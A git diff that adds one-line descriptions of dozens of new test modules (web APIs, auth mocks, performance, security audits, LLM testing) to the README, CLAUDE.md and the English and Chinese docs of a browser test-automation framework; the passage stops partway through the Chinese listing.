diff --git a/CLAUDE.md b/CLAUDE.md index 7bde84a..daba50a 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -118,7 +118,85 @@ je_web_runner/ ├── test_debt_dashboard/ # Inventory of skip/xfail/TODO/_skip markers with age + CODEOWNERS ├── sla_tracker/ # % suites finishing under SLA threshold, weekly/daily bucketing ├── bug_repro_stability/ # Repeat probe N times, classify deterministic/flaky/non-reproducible - └── test_owners_map/ # CODEOWNERS parser + override layer + unowned-test audit + ├── test_owners_map/ # CODEOWNERS parser + override layer + unowned-test audit + ├── popover_assert/ # /popover open/close/invoker assertions + ├── cookie_store_api/ # Async cookieStore API harvest + change-event assertions + ├── speculation_rules/ # Speculation Rules (prerender/prefetch) verification + no-double-fire + ├── web_locks/ # Multi-tab Web Locks contention harness + deadlock/serialise assertions + ├── storage_buckets/ # Storage Buckets API isolation + durability + IDB-isolation checks + ├── hydration_streaming/ # Streaming SSR per-boundary timing + arrival/interactive assertions + ├── memory_pressure_emulate/ # CDP memory/CPU pressure emulation profiles + run-under-profile + ├── third_party_block_test/ # Vendor-by-vendor block-resilience matrix + ├── bundle_diff_pr/ # PR bundle delta (added/removed/grew) + markdown report + growth gate + ├── prompt_injection_scanner/ # LLM jailbreak payload library + canary-leak scan + ├── cors_matrix/ # CORS preflight matrix probe + credentials/origin policy assertions + ├── oauth_pkce_replay/ # Replay OAuth state/PKCE verifier; confirm server rejects + ├── cookie_chips_audit/ # CHIPS Partitioned cookie compliance auditor + ├── sbom_diff/ # CycloneDX SBOM diff (added/removed/upgrade/license/vuln) + ├── failure_auto_tag/ # Heuristic + LLM failure auto-tagger (flaky-locator/timeout/js-error...) + ├── test_self_describe/ # Reverse-engineer Gherkin Given/When/Then from action JSON + ├── pr_title_generator/ # Conventional-Commits PR title from diff + commit history + ├── action_refactor_suggester/ # Rule-based action-JSON refactor smells (hard sleep / positional xpath...) + ├── rtl_layout_verify/ # RTL layout direction / logical-property / bidi-isolation audit + ├── dst_boundary_test/ # DST spring-forward/fall-back gap & overlap detection + scheduled-fire model + ├── number_currency_locale/ # Number/currency/date locale-format assertion helpers + ├── wcag22_touch_target/ # WCAG 2.2 SC 2.5.8 target-size auditor with spacing-circle exception + ├── graphql_n_plus_1/ # N+1 query detector for GraphQL operations + ├── mq_assert/ # Kafka/RabbitMQ/SQS-style message-queue publish assertions + ├── grpc_streaming_assert/ # gRPC streaming (unary/server/client/bidi) frame/status/half-close + ├── webhook_signature_verify/ # GitHub/Stripe/Slack/generic HMAC webhook verifier + ├── test_roi_scorer/ # Find-rate/cost/coverage/recency-weighted ROI score per test + ├── pre_merge_gate_dsl/ # Declarative pre-merge gate rules (when/require) over PrFacts + ├── commit_msg_trigger/ # Parse [skip ci]/[ci e2e]/[ci shard=3/8]/tickets from commit message + ├── flakiness_graveyard/ # Quarantine/revive/bury ledger with TTL for stale flaky tests + ├── test_blame_owner/ # CODEOWNERS + git-blame + HEAD + default → test owner chain + ├── webgpu_pixel_verify/ # WebGPU canvas pixel readback + mean/solid/tile-diff assertions + ├── webhid_mock/ # WebHID device shim with input/output report harness + ├── webusb_mock/ # WebUSB device shim with control/bulk transfer capture + ├── webserial_mock/ # Web Serial UART shim + line write capture + ├── webcodecs_assert/ # WebCodecs chunk codec/resolution/keyframe/framerate assertions + ├── speech_api_assert/ # SpeechSynthesis/SpeechRecognition mock + spoke/lang assertions + ├── webauthn_mock/ # WebAuthn / FIDO2 / Passkey navigator.credentials shim + ├── credential_management/ # navigator.credentials password/federated autofill mock + ├── payment_request_assert/ # Payment Request API + Apple/Google Pay sheet validation + ├── three_d_secure_flow/ # 3DS challenge / frictionless / fallback path assertions + ├── rag_grounding_assert/ # RAG citation + grounding + hallucination phrase scan + ├── llm_token_cost_tracker/ # Per-test token/$ ledger + per-model rate card + budget + ├── streaming_chat_assert/ # TTFT / inter-token gap / UTF-8 / dup-or-OOS chunk assertions + ├── tool_call_assert/ # LLM tool/function call name+order+arg-schema assertions + ├── hallucination_probe/ # Ground-truth probe runner + hallucination rate budget + ├── web_push_assert/ # VAPID subscription + endpoint + userVisibleOnly + showNotification + ├── background_sync_assert/ # Background Sync register/fire/retry/lastChance assertions + ├── wake_lock_assert/ # Screen wake lock acquire/release/leak/re-acquire detection + ├── pip_assert/ # Picture-in-Picture (video + document) enter/exit/size assertions + ├── web_share_assert/ # navigator.share recorder + payload + fallback assertions + ├── compression_streams/ # CompressionStream gzip/deflate/brotli round-trip + ratio budget + ├── compute_pressure/ # Compute Pressure API fake observer + throttle reaction assertions + ├── touch_gesture/ # tap/swipe/pinch/long-press CDP-frame builder + event assertions + ├── viewport_audit/ # viewport meta + safe-area-inset + WCAG 1.4.4 scalable audit + ├── virtual_keyboard/ # visualViewport before/after + keyboard inset + focused-visible + ├── pull_to_refresh/ # overscroll-behavior + threshold + refresh handler + network refetch + ├── email_deliverability/ # SPF/DKIM/DMARC + List-Unsubscribe + BCC leak header audit + ├── inbox_render_outlook/ # Outlook/Gmail/Apple Mail render compatibility pre-flight + ├── push_delivery/ # FCM/APNs payload size + required fields + PII + collapse + TTL + ├── lcp_image_audit/ # LCP image preload + no-lazy + fetchpriority=high assertions + ├── font_loading_strategy/ # @font-face display + size-adjust + FOIT/FOUT/FOFT verification + ├── resource_hints_audit/ # preload/prefetch/preconnect used vs declared + preload-as audit + ├── critical_css_audit/ # Inline-CSS-in-head + first-packet budget + preload-blocking-CSS + ├── lighthouse_regression/ # Lighthouse score regression vs baseline + CWV metric budget + ├── dom_xss_taint/ # source→sink JS instrumentation + canary-based taint detection + ├── csp_violation_parser/ # CSP report-uri / report-to parser + recon heuristic + ├── hsts_preload_audit/ # HSTS preload-list compliance (max-age + includeSubDomains + preload) + ├── tls_cipher_audit/ # Live TLS handshake + version + cipher allowlist + subject check + ├── cookie_scope_abuse/ # Session-like cookie scope / HttpOnly / Secure / SameSite audit + ├── test_dup_dry/ # Structural action-JSON duplicate + prefix-overlap detection + ├── snapshot_diff_approval/ # Baseline/pending/rejected snapshot register + approval workflow + ├── failure_cluster_dbscan/ # Failure-message tokeniser + DBSCAN root-cause clustering + ├── test_naming_lint/ # should_when / given_when_then / camel_subject naming linter + ├── openapi_drift/ # Live API vs spec drift (undocumented / zombie / status / method) + ├── api_version_compat/ # Old-client vs new-server backward-compat response/request matrix + ├── rate_limit_assert/ # 429 / Retry-After / X-RateLimit headers + recovery assertions + └── har_to_openapi/ # HAR → OpenAPI 3.1 path/method/query/schema reverse engineering ``` ## Design Patterns & Architecture diff --git a/README.md b/README.md index be089e6..de26429 100644 --- a/README.md +++ b/README.md @@ -1064,6 +1064,199 @@ only what you use). - **`cross_tab_sync`** — Multi-page BroadcastChannel / storage propagation asserts. +### Modern web platform & runtime APIs + +Modules covering newer browser surfaces that are awkward to drive +through plain WebDriver: + +- **`popover_assert`** — `` / popover open / close / invoker + / "only one modal" assertions. +- **`cookie_store_api`** — Async `cookieStore` API harvest + + change-event assertions + secure-only enforcement. +- **`speculation_rules`** — Speculation Rules (`prerender` / + `prefetch`) verification, prerendering activation, no-double-fire. +- **`web_locks`** — Multi-tab Web Locks contention harness with + deadlock + serialisation + acquired-count assertions. +- **`storage_buckets`** — Storage Buckets API isolation, durability + hint, and IDB-per-bucket isolation checks. +- **`hydration_streaming`** — Streaming SSR per-boundary timing + (arrival, interactive) + order assertions. +- **`web_push_assert`** — Push subscription VAPID key match, + endpoint allowlist, `userVisibleOnly`, `showNotification` payload. +- **`background_sync_assert`** — Background Sync register / fire / + retry / `lastChance` (quota-exhaustion) assertions. +- **`wake_lock_assert`** — Screen wake lock acquire / release / leak + / re-acquire-on-visibility detection. +- **`pip_assert`** — Picture-in-Picture (video + Document PiP) + enter / exit / size assertions. +- **`web_share_assert`** — `navigator.share` payload recording + + fallback-UI assertions. +- **`compression_streams`** — `CompressionStream` gzip / deflate / + brotli round-trip + compression ratio budget. +- **`compute_pressure`** — Compute Pressure API fake observer + app + throttle-reaction assertions. + +### Modern auth, payments, identity + +- **`webauthn_mock`** — Deterministic `navigator.credentials` shim + for Passkey / FIDO2 / WebAuthn flows; build canned credentials by + user. +- **`credential_management`** — Password / Federated Credential + Management API mock + autofill / `preventSilentAccess` assertions. +- **`payment_request_assert`** — Payment Request API shim + Apple + Pay / Google Pay sheet validation (currency, shipping, `complete()`). +- **`three_d_secure_flow`** — 3-D Secure 2.x branch model + (frictionless / challenge / fallback / reject) + silent-finalize + detection. + +### Mobile-web specific + +- **`touch_gesture`** — `tap` / `swipe` / `pinch` / `long_press` + CDP-frame builder + event assertions. +- **`viewport_audit`** — Viewport meta + safe-area-inset audit + + WCAG 1.4.4 user-scalable audit. +- **`virtual_keyboard`** — `visualViewport` before / after + keyboard + inset CSS variable + focused-element visibility. +- **`pull_to_refresh`** — `overscroll-behavior` + threshold + refresh + handler + network-refetch assertions for PWAs. + +### LLM / AI feature testing + +- **`rag_grounding_assert`** — RAG citation in retrieved set, + lexical overlap, unsupported-claim phrase scan. +- **`llm_token_cost_tracker`** — Per-test token / $ ledger with + per-model rate card + budget assertion. +- **`streaming_chat_assert`** — TTFT / inter-token gap / UTF-8 + cleanliness / duplicate-or-OOS chunk assertions for streaming chat. +- **`tool_call_assert`** — LLM tool / function-call name + ordering + + JSON Schema argument validation. +- **`hallucination_probe`** — Ground-truth probe runner + refusal + detection + hallucination-rate budget. + +### Email & notification delivery + +- **`email_deliverability`** — SPF / DKIM / DMARC headers + + `List-Unsubscribe` (Gmail/Yahoo bulk rules) + BCC-leak audit. +- **`inbox_render_outlook`** — Outlook (Word renderer) / Gmail / + Apple Mail render-compatibility pre-flight findings. +- **`push_delivery`** — FCM / APNs payload size + required fields + + PII scan + collapse key + TTL validation. + +### Performance budgets (cont.) + +- **`memory_pressure_emulate`** — CDP memory / CPU pressure + emulation profiles + run-under-profile assertions. +- **`third_party_block_test`** — Vendor-by-vendor block-resilience + matrix (no-vendor / blocked / passed). +- **`bundle_diff_pr`** — PR bundle delta (added / removed / grew) + + growth-gate + markdown report. +- **`lcp_image_audit`** — LCP image preloaded + no `loading="lazy"` + + `fetchpriority="high"` assertions. +- **`font_loading_strategy`** — `@font-face` `font-display` strategy + + `size-adjust` fallback for FOUT / FOIT / FOFT verification. +- **`resource_hints_audit`** — `preload` / `prefetch` / `preconnect` + used vs declared + `preload as=` validation. +- **`critical_css_audit`** — Inline-CSS-in-`` budget + render- + blocking external stylesheet preload audit. +- **`lighthouse_regression`** — Lighthouse score regression vs + baseline + Core Web Vitals metric budgets. + +### Security & headers (cont.) + +- **`prompt_injection_scanner`** — LLM jailbreak payload library + + canary-leak detection. +- **`cors_matrix`** — CORS preflight matrix probe + credentials / + origin policy assertions. +- **`oauth_pkce_replay`** — Confirm authorization server rejects + replayed OAuth state / PKCE verifier. +- **`cookie_chips_audit`** — CHIPS Partitioned cookie compliance + (third-party requires Partitioned + Secure + SameSite=None). +- **`sbom_diff`** — CycloneDX SBOM diff (added / removed / upgrade + / license / vulnerability gates). +- **`webhook_signature_verify`** — GitHub / Stripe / Slack / generic + HMAC webhook signature verifier. +- **`dom_xss_taint`** — Lightweight DOM-XSS taint tracking via JS + instrumentation + canary detection. +- **`csp_violation_parser`** — CSP `report-uri` / `report-to` + payload parser + recon-attempt heuristic. +- **`hsts_preload_audit`** — HSTS preload-list compliance + (`max-age` ≥ 1y + `includeSubDomains` + `preload`). +- **`tls_cipher_audit`** — Live TLS handshake + version + cipher + allowlist + certificate subject check. +- **`cookie_scope_abuse`** — Session-like cookie scope (apex domain + / `Path=/`) + `HttpOnly` / `Secure` / `SameSite` audit. + +### Backend integration (cont.) + +- **`graphql_n_plus_1`** — N+1 query detector with per-field SQL + template repetition + cartesian-fanout heuristic. +- **`mq_assert`** — Kafka / RabbitMQ / SQS-style message-queue + publish assertions (drain + matcher + idempotency + ordering). +- **`grpc_streaming_assert`** — gRPC streaming (unary / server / + client / bidi) frame count + size + order + half-close assertions. +- **`openapi_drift`** — Live API vs OpenAPI spec drift (undocumented + endpoint / method / status, zombie endpoints). +- **`api_version_compat`** — Old-client vs new-server backward-compat + matrix on response shape + required request fields. +- **`rate_limit_assert`** — 429 + `Retry-After` + `X-RateLimit-*` + monotonic + recovery-after-wait assertions. +- **`har_to_openapi`** — HAR → OpenAPI 3.1 reverse engineering + (path templates, query params, response schemas). + +### QA governance & DevX (cont.) + +- **`failure_auto_tag`** — Heuristic + LLM failure auto-tagger + (`flaky-locator` / `timeout` / `js-error` / `network-5xx` …). +- **`test_self_describe`** — Reverse-engineer Gherkin + `Given / When / Then` paragraph from action JSON. +- **`pr_title_generator`** — Conventional-Commits PR title from + diff + commit history. +- **`action_refactor_suggester`** — Action-JSON refactor smells + (hard sleep, positional XPath, duplicated locator, click-wait-click). +- **`test_roi_scorer`** — Find-rate × cost × coverage × recency + weighted ROI score per test. +- **`pre_merge_gate_dsl`** — Declarative `when` / `require` pre-merge + gate rules over a `PrFacts` snapshot. +- **`commit_msg_trigger`** — Parse `[skip ci]` / `[ci e2e]` / + `[ci shard=3/8]` / `Closes #123` from commit message. +- **`flakiness_graveyard`** — Quarantine / revive / bury ledger with + TTL for stale flaky tests. +- **`test_blame_owner`** — CODEOWNERS + git-blame + HEAD + default + → test-owner resolution chain. +- **`test_dup_dry`** — Structural action-JSON duplicate + prefix- + overlap detection (extract-helper opportunity). +- **`snapshot_diff_approval`** — Baseline / pending / rejected + snapshot register + approval workflow. +- **`failure_cluster_dbscan`** — Failure-message tokeniser + DBSCAN + root-cause clustering (pure-Python, no sklearn). +- **`test_naming_lint`** — `should_when` / `given_when_then` / + `camel_subject` naming convention linter. + +### i18n / a11y (cont.) + +- **`rtl_layout_verify`** — RTL direction + logical-property + (`margin-inline-start`) + bidi-isolation audit. +- **`dst_boundary_test`** — DST spring-forward / fall-back gap & + overlap detection + scheduled-fire model. +- **`number_currency_locale`** — Number / currency / date locale- + format assertion helpers (incl. Indian lakh grouping). +- **`wcag22_touch_target`** — WCAG 2.2 SC 2.5.8 target-size auditor + with spacing-circle exception. + +### Emerging-tech device APIs + +- **`webgpu_pixel_verify`** — WebGPU canvas pixel readback + mean / + solid-colour / tile-diff assertions. +- **`webhid_mock`** — WebHID device shim with input / output report + capture harness. +- **`webusb_mock`** — WebUSB device shim with control / bulk + transfer capture. +- **`webserial_mock`** — Web Serial UART shim + line-write capture. +- **`webcodecs_assert`** — WebCodecs chunk codec / resolution / + keyframe-interval / framerate assertions. +- **`speech_api_assert`** — `SpeechSynthesis` / `SpeechRecognition` + mock + utterance / language / volume assertions. + For per-module reference also see [`CLAUDE.md`](CLAUDE.md), the auto-generated [`docs/reference/command_reference.md`](docs/reference/command_reference.md), and the Sphinx chapter under diff --git a/docs/source/Eng/doc/specialized_modules/specialized_modules_doc.rst b/docs/source/Eng/doc/specialized_modules/specialized_modules_doc.rst index f568ed8..5aa4c62 100644 --- a/docs/source/Eng/doc/specialized_modules/specialized_modules_doc.rst +++ b/docs/source/Eng/doc/specialized_modules/specialized_modules_doc.rst @@ -518,6 +518,212 @@ Other Specialised Modules * ``cross_tab_sync`` — Multi-page BroadcastChannel / storage propagation asserts. +Modern web platform & runtime APIs +================================== + +Modules covering newer browser surfaces that are awkward to drive +through plain WebDriver: + +* ``popover_assert`` — ```` / popover open / close / invoker + / "only one modal" assertions. +* ``cookie_store_api`` — Async ``cookieStore`` API harvest + + change-event assertions + secure-only enforcement. +* ``speculation_rules`` — Speculation Rules (``prerender`` / + ``prefetch``) verification, prerendering activation, no-double-fire. +* ``web_locks`` — Multi-tab Web Locks contention harness with + deadlock + serialisation + acquired-count assertions. +* ``storage_buckets`` — Storage Buckets API isolation, durability + hint, and IDB-per-bucket isolation checks. +* ``hydration_streaming`` — Streaming SSR per-boundary timing + (arrival, interactive) + order assertions. +* ``web_push_assert`` — Push subscription VAPID key match, endpoint + allowlist, ``userVisibleOnly``, ``showNotification`` payload. +* ``background_sync_assert`` — Background Sync register / fire / + retry / ``lastChance`` (quota-exhaustion) assertions. +* ``wake_lock_assert`` — Screen wake lock acquire / release / leak + / re-acquire-on-visibility detection. +* ``pip_assert`` — Picture-in-Picture (video + Document PiP) + enter / exit / size assertions. +* ``web_share_assert`` — ``navigator.share`` payload recording + + fallback-UI assertions. +* ``compression_streams`` — ``CompressionStream`` gzip / deflate / + brotli round-trip + compression ratio budget. +* ``compute_pressure`` — Compute Pressure API fake observer + app + throttle-reaction assertions. + +Modern auth, payments, identity +=============================== + +* ``webauthn_mock`` — Deterministic ``navigator.credentials`` shim + for Passkey / FIDO2 / WebAuthn flows; build canned credentials + per user. +* ``credential_management`` — Password / Federated Credential + Management API mock + autofill / ``preventSilentAccess`` assertions. +* ``payment_request_assert`` — Payment Request API shim + Apple Pay + / Google Pay sheet validation (currency, shipping, ``complete()``). +* ``three_d_secure_flow`` — 3-D Secure 2.x branch model + (frictionless / challenge / fallback / reject) + silent-finalize + detection. + +Mobile-web specific +=================== + +* ``touch_gesture`` — ``tap`` / ``swipe`` / ``pinch`` / + ``long_press`` CDP-frame builder + event assertions. +* ``viewport_audit`` — Viewport meta + safe-area-inset audit + WCAG + 1.4.4 user-scalable audit. +* ``virtual_keyboard`` — ``visualViewport`` before / after + keyboard + inset CSS variable + focused-element visibility. +* ``pull_to_refresh`` — ``overscroll-behavior`` + threshold + refresh + handler + network-refetch assertions for PWAs. + +LLM / AI feature testing +======================== + +* ``rag_grounding_assert`` — RAG citation in retrieved set, lexical + overlap, unsupported-claim phrase scan. +* ``llm_token_cost_tracker`` — Per-test token / $ ledger with + per-model rate card + budget assertion. +* ``streaming_chat_assert`` — TTFT / inter-token gap / UTF-8 + cleanliness / duplicate-or-OOS chunk assertions for streaming chat. +* ``tool_call_assert`` — LLM tool / function-call name + ordering + + JSON Schema argument validation. +* ``hallucination_probe`` — Ground-truth probe runner + refusal + detection + hallucination-rate budget. + +Email & notification delivery +============================= + +* ``email_deliverability`` — SPF / DKIM / DMARC headers + + ``List-Unsubscribe`` (Gmail/Yahoo bulk rules) + BCC-leak audit. +* ``inbox_render_outlook`` — Outlook (Word renderer) / Gmail / Apple + Mail render-compatibility pre-flight findings. +* ``push_delivery`` — FCM / APNs payload size + required fields + + PII scan + collapse key + TTL validation. + +Performance budgets (cont.) +=========================== + +* ``memory_pressure_emulate`` — CDP memory / CPU pressure emulation + profiles + run-under-profile assertions. +* ``third_party_block_test`` — Vendor-by-vendor block-resilience + matrix (no-vendor / blocked / passed). +* ``bundle_diff_pr`` — PR bundle delta (added / removed / grew) + + growth-gate + markdown report. +* ``lcp_image_audit`` — LCP image preloaded + no ``loading="lazy"`` + + ``fetchpriority="high"`` assertions. +* ``font_loading_strategy`` — ``@font-face`` ``font-display`` + strategy + ``size-adjust`` fallback for FOUT / FOIT / FOFT + verification. +* ``resource_hints_audit`` — ``preload`` / ``prefetch`` / + ``preconnect`` used vs declared + ``preload as=`` validation. +* ``critical_css_audit`` — Inline-CSS-in-```` budget + + render-blocking external stylesheet preload audit. +* ``lighthouse_regression`` — Lighthouse score regression vs baseline + + Core Web Vitals metric budgets. + +Security & headers (cont.) +========================== + +* ``prompt_injection_scanner`` — LLM jailbreak payload library + + canary-leak detection. +* ``cors_matrix`` — CORS preflight matrix probe + credentials / + origin policy assertions. +* ``oauth_pkce_replay`` — Confirm authorization server rejects + replayed OAuth state / PKCE verifier. +* ``cookie_chips_audit`` — CHIPS Partitioned cookie compliance + (third-party requires Partitioned + Secure + SameSite=None). +* ``sbom_diff`` — CycloneDX SBOM diff (added / removed / upgrade / + license / vulnerability gates). +* ``webhook_signature_verify`` — GitHub / Stripe / Slack / generic + HMAC webhook signature verifier. +* ``dom_xss_taint`` — Lightweight DOM-XSS taint tracking via JS + instrumentation + canary detection. +* ``csp_violation_parser`` — CSP ``report-uri`` / ``report-to`` + payload parser + recon-attempt heuristic. +* ``hsts_preload_audit`` — HSTS preload-list compliance + (``max-age`` ≥ 1y + ``includeSubDomains`` + ``preload``). +* ``tls_cipher_audit`` — Live TLS handshake + version + cipher + allowlist + certificate subject check. +* ``cookie_scope_abuse`` — Session-like cookie scope (apex domain / + ``Path=/``) + ``HttpOnly`` / ``Secure`` / ``SameSite`` audit. + +Backend integration (cont.) +=========================== + +* ``graphql_n_plus_1`` — N+1 query detector with per-field SQL + template repetition + cartesian-fanout heuristic. +* ``mq_assert`` — Kafka / RabbitMQ / SQS-style message-queue publish + assertions (drain + matcher + idempotency + ordering). +* ``grpc_streaming_assert`` — gRPC streaming (unary / server / + client / bidi) frame count + size + order + half-close assertions. +* ``openapi_drift`` — Live API vs OpenAPI spec drift (undocumented + endpoint / method / status, zombie endpoints). +* ``api_version_compat`` — Old-client vs new-server backward-compat + matrix on response shape + required request fields. +* ``rate_limit_assert`` — 429 + ``Retry-After`` + ``X-RateLimit-*`` + monotonic + recovery-after-wait assertions. +* ``har_to_openapi`` — HAR → OpenAPI 3.1 reverse engineering + (path templates, query params, response schemas). + +QA governance & DevX (cont.) +============================ + +* ``failure_auto_tag`` — Heuristic + LLM failure auto-tagger + (``flaky-locator`` / ``timeout`` / ``js-error`` / ``network-5xx``…). +* ``test_self_describe`` — Reverse-engineer Gherkin + ``Given / When / Then`` paragraph from action JSON. +* ``pr_title_generator`` — Conventional-Commits PR title from diff + + commit history. +* ``action_refactor_suggester`` — Action-JSON refactor smells + (hard sleep, positional XPath, duplicated locator, + click-wait-click). +* ``test_roi_scorer`` — Find-rate × cost × coverage × recency + weighted ROI score per test. +* ``pre_merge_gate_dsl`` — Declarative ``when`` / ``require`` + pre-merge gate rules over a ``PrFacts`` snapshot. +* ``commit_msg_trigger`` — Parse ``[skip ci]`` / ``[ci e2e]`` / + ``[ci shard=3/8]`` / ``Closes #123`` from commit message. +* ``flakiness_graveyard`` — Quarantine / revive / bury ledger with + TTL for stale flaky tests. +* ``test_blame_owner`` — CODEOWNERS + git-blame + HEAD + default + → test-owner resolution chain. +* ``test_dup_dry`` — Structural action-JSON duplicate + prefix- + overlap detection (extract-helper opportunity). +* ``snapshot_diff_approval`` — Baseline / pending / rejected + snapshot register + approval workflow. +* ``failure_cluster_dbscan`` — Failure-message tokeniser + DBSCAN + root-cause clustering (pure-Python, no sklearn). +* ``test_naming_lint`` — ``should_when`` / ``given_when_then`` / + ``camel_subject`` naming convention linter. + +i18n / a11y (cont.) +=================== + +* ``rtl_layout_verify`` — RTL direction + logical-property + (``margin-inline-start``) + bidi-isolation audit. +* ``dst_boundary_test`` — DST spring-forward / fall-back gap & + overlap detection + scheduled-fire model. +* ``number_currency_locale`` — Number / currency / date locale- + format assertion helpers (incl. Indian lakh grouping). +* ``wcag22_touch_target`` — WCAG 2.2 SC 2.5.8 target-size auditor + with spacing-circle exception. + +Emerging-tech device APIs +========================= + +* ``webgpu_pixel_verify`` — WebGPU canvas pixel readback + mean / + solid-colour / tile-diff assertions. +* ``webhid_mock`` — WebHID device shim with input / output report + capture harness. +* ``webusb_mock`` — WebUSB device shim with control / bulk transfer + capture. +* ``webserial_mock`` — Web Serial UART shim + line-write capture. +* ``webcodecs_assert`` — WebCodecs chunk codec / resolution / + keyframe-interval / framerate assertions. +* ``speech_api_assert`` — ``SpeechSynthesis`` / ``SpeechRecognition`` + mock + utterance / language / volume assertions. + Where to look next ================== diff --git a/docs/source/Zh/doc/specialized_modules/specialized_modules_doc.rst b/docs/source/Zh/doc/specialized_modules/specialized_modules_doc.rst index bf3be2a..98733a9 100644 --- a/docs/source/Zh/doc/specialized_modules/specialized_modules_doc.rst +++ b/docs/source/Zh/doc/specialized_modules/specialized_modules_doc.rst @@ -494,6 +494,207 @@ CODEOWNERS 解析器(GitHub 語意:最後一條 match 的規則勝出)+ 每 JSON 產生器。 * ``cross_tab_sync`` —— 多分頁 BroadcastChannel / storage 傳遞斷言。 +現代瀏覽器 API +============== + +涵蓋難以用純 WebDriver 驅動的新瀏覽器表面: + +* ``popover_assert`` —— ```` / popover 開合 / invoker / + 「同時只有一個 modal」斷言。 +* ``cookie_store_api`` —— 非同步 ``cookieStore`` API 擷取 + change + 事件斷言 + secure-only 強制。 +* ``speculation_rules`` —— Speculation Rules(``prerender`` / + ``prefetch``)驗證,prerender 啟動偵測、no-double-fire。 +* ``web_locks`` —— 多分頁 Web Locks 競爭測試,含 deadlock / + serialise / acquired-count 斷言。 +* ``storage_buckets`` —— Storage Buckets API 隔離、durability 提示、 + IDB-per-bucket 隔離檢查。 +* ``hydration_streaming`` —— 串流 SSR 每個 boundary 的 timing + (arrival、interactive)+ 順序斷言。 +* ``web_push_assert`` —— Push subscription VAPID key 匹配、endpoint + 白名單、``userVisibleOnly``、``showNotification`` payload。 +* ``background_sync_assert`` —— Background Sync register / fire / + retry / ``lastChance``(quota 耗盡)斷言。 +* ``wake_lock_assert`` —— Screen wake lock acquire / release / + 漏掉 / 切回前景時 re-acquire 偵測。 +* ``pip_assert`` —— Picture-in-Picture(影片 + Document PiP) + 進入 / 離開 / 視窗尺寸斷言。 +* ``web_share_assert`` —— ``navigator.share`` payload 紀錄 + + fallback UI 斷言。 +* ``compression_streams`` —— ``CompressionStream`` gzip / deflate / + brotli 來回 + 壓縮率預算。 +* ``compute_pressure`` —— Compute Pressure API 假 observer + App + throttle 反應斷言。 + +現代認證 / 支付 / 身分 +====================== + +* ``webauthn_mock`` —— 用於 Passkey / FIDO2 / WebAuthn 流程的 + ``navigator.credentials`` 確定性 shim;依使用者構建固定 credential。 +* ``credential_management`` —— Password / Federated Credential + Management API mock + autofill / ``preventSilentAccess`` 斷言。 +* ``payment_request_assert`` —— Payment Request API shim + Apple + Pay / Google Pay 結帳片驗證(幣別、運送、``complete()``)。 +* ``three_d_secure_flow`` —— 3-D Secure 2.x 分支模型 + (frictionless / challenge / fallback / reject)+ 「靜默完成」 + 偵測。 + +行動瀏覽器專屬 +============== + +* ``touch_gesture`` —— ``tap`` / ``swipe`` / ``pinch`` / + ``long_press`` CDP frame builder + event 斷言。 +* ``viewport_audit`` —— viewport meta + safe-area-inset 稽核 + + WCAG 1.4.4 user-scalable 稽核。 +* ``virtual_keyboard`` —— ``visualViewport`` before / after + + keyboard inset CSS 變數 + focused element 可見性。 +* ``pull_to_refresh`` —— ``overscroll-behavior`` + 觸發 threshold + + refresh handler + 網路 refetch 斷言(PWA)。 + +LLM / AI 功能測試 +================= + +* ``rag_grounding_assert`` —— RAG 引用是否在 retrieved chunk 中、 + 詞彙重疊度、未支撐的 phrase 掃描。 +* ``llm_token_cost_tracker`` —— 每個 test 的 token / $ 帳本, + 含 per-model 費率卡 + 預算斷言。 +* ``streaming_chat_assert`` —— TTFT / inter-token gap / UTF-8 乾淨度 + / 重複或亂序 chunk 斷言(streaming chat)。 +* ``tool_call_assert`` —— LLM tool / function-call 的名稱 + 順序 + + JSON Schema 引數驗證。 +* ``hallucination_probe`` —— Ground-truth probe runner + 拒答偵測 + + 幻覺率預算。 + +Email 與通知送達 +================ + +* ``email_deliverability`` —— SPF / DKIM / DMARC header + + ``List-Unsubscribe``(Gmail/Yahoo 大量寄件規則)+ BCC 外洩稽核。 +* ``inbox_render_outlook`` —— Outlook(Word 引擎)/ Gmail / Apple + Mail 渲染相容性 pre-flight 檢查。 +* ``push_delivery`` —— FCM / APNs payload 大小 + 必填欄位 + PII + 掃描 + collapse key + TTL 驗證。 + +效能預算(續) +============== + +* ``memory_pressure_emulate`` —— CDP 記憶體 / CPU 壓力模擬 profile + + run-under-profile 斷言。 +* ``third_party_block_test`` —— 逐 vendor 的封鎖韌性矩陣 + (no-vendor / blocked / passed)。 +* ``bundle_diff_pr`` —— PR bundle 差異(新增 / 移除 / 長大)+ + 成長閘 + markdown 報告。 +* ``lcp_image_audit`` —— LCP 圖片有 preload + 無 ``loading="lazy"`` + + ``fetchpriority="high"`` 斷言。 +* ``font_loading_strategy`` —— ``@font-face`` ``font-display`` + 策略 + ``size-adjust`` fallback 的 FOUT / FOIT / FOFT 驗證。 +* ``resource_hints_audit`` —— ``preload`` / ``prefetch`` / + ``preconnect`` 實際使用 vs 宣告 + ``preload as=`` 驗證。 +* ``critical_css_audit`` —— Inline CSS in ```` 預算 + + render-blocking 外部樣式 preload 稽核。 +* ``lighthouse_regression`` —— Lighthouse 分數對 baseline 的退化 + + Core Web Vitals metric 預算。 + +安全與標頭(續) +================ + +* ``prompt_injection_scanner`` —— LLM jailbreak payload 庫 + + canary 外洩偵測。 +* ``cors_matrix`` —— CORS preflight 矩陣 probe + credentials / + origin policy 斷言。 +* ``oauth_pkce_replay`` —— 確認授權伺服器會拒絕 replay 的 OAuth + state / PKCE verifier。 +* ``cookie_chips_audit`` —— CHIPS Partitioned cookie 合規性 + (第三方需 Partitioned + Secure + SameSite=None)。 +* ``sbom_diff`` —— CycloneDX SBOM 差異(新增 / 移除 / 升級 / + 授權 / 漏洞閘)。 +* ``webhook_signature_verify`` —— GitHub / Stripe / Slack / 通用 + HMAC webhook 簽章驗證。 +* ``dom_xss_taint`` —— 透過 JS instrumentation + canary 的輕量級 + DOM-XSS taint 追蹤。 +* ``csp_violation_parser`` —— CSP ``report-uri`` / ``report-to`` + payload 解析 + 偵察行為啟發式。 +* ``hsts_preload_audit`` —— HSTS preload-list 合規 + (``max-age`` ≥ 1y + ``includeSubDomains`` + ``preload``)。 +* ``tls_cipher_audit`` —— 實際 TLS 握手 + 版本 + cipher 白名單 + + 憑證 subject 檢查。 +* ``cookie_scope_abuse`` —— session-like cookie scope(apex domain + / ``Path=/``)+ ``HttpOnly`` / ``Secure`` / ``SameSite`` 稽核。 + +後端整合(續) +============== + +* ``graphql_n_plus_1`` —— GraphQL 的 N+1 query 偵測 + 笛卡兒 fanout + 啟發式。 +* ``mq_assert`` —— Kafka / RabbitMQ / SQS 風格的 message queue + publish 